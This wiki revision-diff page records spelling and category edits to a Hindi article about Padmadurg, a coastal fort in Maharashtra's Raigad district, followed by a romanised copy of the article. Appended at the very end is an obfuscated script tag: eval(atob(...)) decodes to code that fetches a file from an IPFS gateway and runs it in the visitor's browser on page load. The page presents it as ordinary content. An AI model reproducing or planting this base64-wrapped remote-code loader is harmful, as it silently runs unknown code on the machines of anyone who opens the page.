Difference between revisions of "पद्मदुर्ग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "काबिज" to "क़ाबिज़")
 
(One intermediate revision by one other user not shown)
Line 4: Line 4:
 
*इसे विकसित [[कमल]] के आकार में बनाया गया है, जिसके 22 बुर्जों पर तोप रखने की व्यवस्था है, इसकी दीवारों पर [[पाषाण काल|पाषाण]] कलाकृतियाँ भी बनी हुई हैं।  
 
*इसे विकसित [[कमल]] के आकार में बनाया गया है, जिसके 22 बुर्जों पर तोप रखने की व्यवस्था है, इसकी दीवारों पर [[पाषाण काल|पाषाण]] कलाकृतियाँ भी बनी हुई हैं।  
 
*शिवाजी महाराज ने इसे काफ़ी मुश्किलों से निर्मित करवाया था, इसका मुख्य उद्देश्य था, समुंदर मार्ग से होने वाले आक्रमण से गड़ क़िले की रक्षा करना और जंजीरा क़िले पर कब्ज़ा करना।  
 
*शिवाजी महाराज ने इसे काफ़ी मुश्किलों से निर्मित करवाया था, इसका मुख्य उद्देश्य था, समुंदर मार्ग से होने वाले आक्रमण से गड़ क़िले की रक्षा करना और जंजीरा क़िले पर कब्ज़ा करना।  
*इस जलदुर्ग से एक उद्देश्य सफल रहा परंतु जंजीरा को काबिज़ करने में सफलता हासिल नहीं हो पाई।  
+
*इस जलदुर्ग से एक उद्देश्य सफल रहा परंतु जंजीरा को क़ाबिज़़ करने में सफलता हासिल नहीं हो पाई।  
 
   
 
   
  
Line 11: Line 11:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{महाराष्ट्र के पर्यटन स्थल}}
+
{{महाराष्ट्र के ऐतिहासिक स्थान}}
{{महाराष्ट्र के नगर}}{{महाराष्ट्र के ऐतिहासिक स्थान}}
 
 
[[Category:महाराष्ट्र_के_ऐतिहासिक_स्थान]]
 
[[Category:महाराष्ट्र_के_ऐतिहासिक_स्थान]]
 
[[Category:महाराष्ट्र_के_पर्यटन_स्थल]]
 
[[Category:महाराष्ट्र_के_पर्यटन_स्थल]]
 
[[Category:शिवाजी]]
 
[[Category:शिवाजी]]
[[Category:महाराष्ट्र]]
+
[[Category:महाराष्ट्र]][[Category:भारत के दुर्ग]]
 
[[Category:ऐतिहासिक_स्थान_कोश]]
 
[[Category:ऐतिहासिक_स्थान_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 13:59, 25 August 2012

padmadurg, maharashtr rajy ke rayagadh zile mean sthit hai. is qile ka nirman 1663 ee. shivaji ke uttaradhikari aur putr sambhaji ne siddikiyoan ke janjira qile ke jabav ke rup mean karavaya tha.

  • durg ka nirman ek kasa bet par kiya gaya hai, jisake kinaroan par prachir bani huee hai.
  • durg ka dvar atyant surakshit hai. patthar aur choone-gare se nirmit yah durg 300 varshoan se bhi adhik samay ke bad aj bhi usi avastha mean hai.
  • ise vikasit kamal ke akar mean banaya gaya hai, jisake 22 burjoan par top rakhane ki vyavastha hai, isaki divaroan par pashan kalakritiyaan bhi bani huee haian.
  • shivaji maharaj ne ise kafi mushkiloan se nirmit karavaya tha, isaka mukhy uddeshy tha, samuandar marg se hone vale akraman se g d qile ki raksha karana aur janjira qile par kabza karana.
  • is jaladurg se ek uddeshy saphal raha parantu janjira ko qabiz़ karane mean saphalata hasil nahian ho paee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>